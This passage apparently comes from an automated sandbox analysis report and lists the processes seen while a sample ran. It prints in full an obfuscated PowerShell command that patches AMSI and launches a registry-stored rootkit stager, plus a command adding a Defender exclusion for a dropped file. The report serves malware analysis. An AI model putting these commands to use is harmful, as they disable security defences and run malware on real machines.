                                                                                                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=$ysqdxYMCHCLNa.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+'r'+'e'+[Char](115)+'s',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+'c'+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qnwSIaibfbWlFcLLMVH=zDgZeIZuxWRL @([String])([IntPtr]);$MmSYyEqPQkjxSlmVVTEznD=zDgZeIZuxWRL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$saKjRLExuCO=$ysqdxYMCHCLNa.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$lUrimOjxLHSAgu=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$saKjRLExuCO,[Object]('L'+[Char](111)+'ad'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$BgYJLHVZjDSQrMGil=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$saKjRLExuCO,[Object]('V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$kIpEHaJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lUrimOjxLHSAgu,$qnwSIaibfbWlFcLLMVH).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+'.dll');$rLMnIHfZQPDuCMOEo=$ExDfVzsYxbumyj.Invoke($Null,@([Object]$kIpEHaJ,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+'Sc'+[Char](97)+''+[Char](110)+''+'B'+'uf'+[Char](102)+''+[Char](101)+'r')));$MjFQYglbdB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BgYJLHVZjDSQrMGil,$MmSYyEqPQkjxSlmVVTEznD).Invoke($rLMnIHfZQPDuCMOEo,[uint32]8,4,[ref]$MjFQYglbdB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rLMnIHfZQPDuCMOEo,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BgYJLHVZjDSQrMGil,$MmSYyEqPQkjxSlmVVTEznD).Invoke($rLMnIHfZQPDuCMOEo,[uint32]8,0x20,[ref]$MjFQYglbdB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+[Char](115)+'t'+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: 00000004.00000002.1516696154.000001A854270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: 00000004.00000002.1499817567.000001A84BCC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:5
                                                                                                                                Start time:12:53:01
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:6
                                                                                                                                Start time:12:53:05
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\dllhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94}
                                                                                                                                Imagebase:0x7ff673080000
                                                                                                                                File size:21'312 bytes
                                                                                                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:7
                                                                                                                                Start time:12:53:05
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\winlogon.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:winlogon.exe
                                                                                                                                Imagebase:0x7ff6cc5a0000
                                                                                                                                File size:906'240 bytes
                                                                                                                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:8
                                                                                                                                Start time:12:53:05
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                File size:452'608 bytes
                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:9
                                                                                                                                Start time:12:53:05
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:12:53:06
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\lsass.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\lsass.exe
                                                                                                                                Imagebase:0x7ff6b5fa0000
                                                                                                                                File size:59'456 bytes
                                                                                                                                MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:11
                                                                                                                                Start time:12:53:06
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:12
                                                                                                                                Start time:12:53:07
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\dwm.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"dwm.exe"
                                                                                                                                Imagebase:0x7ff7751a0000
                                                                                                                                File size:94'720 bytes
                                                                                                                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:13
                                                                                                                                Start time:12:53:10
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:15
                                                                                                                                Start time:12:53:10
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:16
                                                                                                                                Start time:12:53:11
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:17
                                                                                                                                Start time:12:53:11
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:18
                                                                                                                                Start time:12:53:11
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:19
                                                                                                                                Start time:12:53:12
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:20
                                                                                                                                Start time:12:53:12
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:21
                                                                                                                                Start time:12:53:13
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:22
                                                                                                                                Start time:12:53:14
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:23
                                                                                                                                Start time:12:53:14
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:24
                                                                                                                                Start time:12:53:15
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:25
                                                                                                                                Start time:12:53:15
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:26
                                                                                                                                Start time:12:53:15
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:28
                                                                                                                                Start time:12:53:16
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:29
                                                                                                                                Start time:12:53:17
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:30
                                                                                                                                Start time:12:53:18
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:31
                                                                                                                                Start time:12:53:18
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:32
                                                                                                                                Start time:12:53:19
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:33
                                                                                                                                Start time:12:53:20
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:34
                                                                                                                                Start time:12:53:20
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:35
                                                                                                                                Start time:12:53:21
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:36
                                                                                                                                Start time:12:53:21
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:37
                                                                                                                                Start time:12:53:22
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:38
                                                                                                                                Start time:12:53:22
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:39
                                                                                                                                Start time:12:53:25
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:40
                                                                                                                                Start time:12:53:25
                                                                                                                                Start date:14/12/2024
                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                Imagebase:0x7ff67e6d0000
                                                                                                                                File size:55'320 bytes
                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:false
